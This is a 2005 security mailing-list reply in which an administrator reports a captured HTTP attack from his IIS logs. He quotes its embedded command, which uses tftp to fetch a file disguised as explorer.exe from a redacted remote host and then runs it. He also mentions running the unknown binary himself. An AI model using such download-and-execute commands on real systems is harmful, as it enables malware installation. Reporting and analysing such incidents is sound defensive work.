Security Incidents mailing list archives
Re: Re: New http attack?
From: phil () ramtronik com
Date: 19 Jun 2005 22:14:59 -0000
Hello,

Saw your post after considerable searching for the same mysterious 'get / 401' errors in my IIS log. I managed to get a full capture of the communication; further down from the 'QUFB' repetition was an embedded string:

cmd /c tftp -i x.x.x.x GET explorer.exe start explorer.exe exit

I have hidden the IP for obvious reasons. I managed to download the file myself manually, and submitted it to Symantec, as my virus checker didn't flag it. Incidentally, I ran the file, and it wasn't explorer, though I don't know what it is.

Phil
Current thread:
- New http attack? Keith T. Morgan (Jun 08)
- Re: New http attack? dullien (Jun 08)
- Re: New http attack? Kirby Angell (Jun 08)
- Re: New http attack? Ron (Jun 09)
- Re: New http attack? Alex (Jun 10)
- Re: New http attack? Ron (Jun 10)
- Re: New http attack? Kevin Timm (Jun 10)
- Re: New http attack? Ron (Jun 09)
- Re: New http attack? Tomaz Solc (Jun 08)
- <Possible follow-ups>
- Re: New http attack? Jason Falciola (Jun 08)
- Re: Re: New http attack? phil (Jun 20)
- Re: Re: New http attack? phil (Jun 20)